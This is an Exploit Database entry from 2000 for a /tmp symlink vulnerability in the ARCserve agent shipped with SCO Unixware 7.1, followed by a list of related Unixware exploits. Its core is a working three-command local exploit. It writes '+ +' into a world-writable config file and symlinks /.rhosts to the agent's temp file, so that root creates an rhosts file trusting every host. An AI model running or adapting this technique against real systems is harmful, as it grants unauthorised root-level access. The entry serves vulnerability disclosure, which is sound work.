Exploit Database - Logo

SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink

EDB-ID: 19752 Author: Shawn Bracken Published: 2000-02-15
CVE: CVE-2000-0154... Type: Local Platform: SCO
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/988/info

A symlink following vulnerability exists in the ARCserve agent, as shipped with SCO Unixware 7. Upon startup, the asagent program will create several files in /tmp. These are created mode 777, and can be removed and replaced by any user on the system. If these are replaced with symlinks, files can be created anywhere on the filesystem, owned by root. This cannot be used to alter the permissions of existing files. However, the contents of the new file are contained in /usr/CYEagent/agent.cfg. This file is world writable. 

echo "+ +" > /usr/CYEagent/agent.cfg
rm /tmp/asagent.tmp
ln -sf /.rhosts /tmp/asagent.tmp
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (2): CVE-2000-0154, CVE-2000-0224
Trying to match OSVDBs (1): 7625
Other Possible E-DB Search Terms: SCO Unixware 7.1/7.1.1,  SCO Unixware 7.1,  SCO Unixware
Date D V Title Author
1999-11-03 Verified HP HP-UX 10.20/11.0 / IBM AIX 4.3 / SCO Unixware 7.0 / Sun Solaris 2.6 - Change File PermissionMastoras
1997-11-24 Verified IBM AIX 3.2/4.1 / SCO Unixware 7.1.1 / SGI IRIX 5.3 / Sun Solaris 2.5.1 - Privilege Escalationanonymous
1999-10-30 Verified SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer OverflowK2
1999-11-25 Verified SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer OverflowK2
1999-12-03 Verified SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' SymlinkBrock Tellier
1998-12-02 Verified SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Local Privilege EscalationBrock Tellier
1999-12-03 Verified SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Local Buffer OverflowBrock Tellier
1999-12-10 Verified SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program DebuggingBrock Tellier
1999-12-03 Verified SCO Unixware 7.1 - '/var/mail' PermissionsBrock Tellier
1999-12-03 Verified SCO Unixware 7.1 - 'pkg' Local Privilege EscalationBrock Tellier
1999-12-22 Verified SCO Unixware 7.1 - i2odialogd Remote Buffer OverflowBrock Tellier
1999-12-06 Verified SCO Unixware 7.1 pkgcat - Local Buffer OverflowBrock Tellier
1999-12-06 Verified SCO Unixware 7.1 pkginstall - Local Buffer OverflowBrock Tellier
2006-02-26 Verified SCO Unixware 7.1.3 - 'ptrace' Local Privilege Escalationprdelka
2008-04-04 Verified SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Local Privilege Escalationqaaz
2008-04-04 Verified SCO UnixWare Merge - 'mcd' Local Privilege Escalationqaaz
2008-04-04 Verified SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalationqaaz
1999-11-25 Verified SCO Unixware 7.0 - 'xlock(1)' 'Username' Local Buffer OverflowAK
Menu